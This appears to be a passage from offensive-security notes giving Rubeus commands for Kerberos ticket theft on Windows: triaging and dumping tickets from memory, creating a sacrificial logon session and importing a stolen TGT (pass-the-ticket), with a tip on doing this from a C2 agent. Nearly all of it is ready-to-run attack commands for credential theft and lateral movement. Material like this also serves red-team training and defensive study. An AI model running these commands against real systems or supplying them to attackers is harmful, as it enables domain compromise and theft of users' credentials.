Show Kerberos tickets in all logon sessions if elevated (otherwise it will only show tickets in current logon session):
PS > .\Rubeus.exe triage
Extract the tickets from memory:
PS > .\Rubeus.exe dump [/service:krbtgt] [/luid:0x1337] /nowrap
Create a sacrificial process (Logon type 9) and import the TGT into its logon session:
PS > .\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /show
PS > .\Rubeus.exe ptt /luid:0x1337 /ticket:<BASE64_TICKET>
{% hint style="info" %}
If operating Rubeus from a C2 agent, you can steal_token instead of using /show option.
{% endhint %}
{% hint style="success" %} You can also extract and reuse TGS tickets with this technique. {% endhint %}